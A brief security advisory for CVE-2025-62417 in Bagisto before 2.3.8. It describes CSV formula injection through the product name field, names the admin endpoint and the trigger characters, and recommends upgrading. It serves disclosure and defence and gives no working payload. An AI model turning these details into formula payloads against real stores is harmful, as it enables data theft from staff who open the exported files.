CVE-2025-62417

Name of the Vulnerable Software and Affected Versions Bagisto versions prior to 2.3.8

Description The application does not neutralize or escape leading formula characters when generating CSV files or accepting CSV import fields. This allows an attacker to supply a CSV field, such as a product name, that contains a formula. When a user opens the CSV file in spreadsheet software, the spreadsheet will interpret and evaluate the content, potentially leading to data exfiltration and remote command execution through older Excel exploits or macros. The issue occurs when product data beginning with a spreadsheet formula character (e.g., =, +, -, or @) is accepted and later exported or saved into a CSV file. The affected API endpoint is '/admin/catalog/products/edit/1'. The vulnerable parameter is the product name field.

Recommendations Versions prior to 2.3.8 should be updated to version 2.3.8 or later.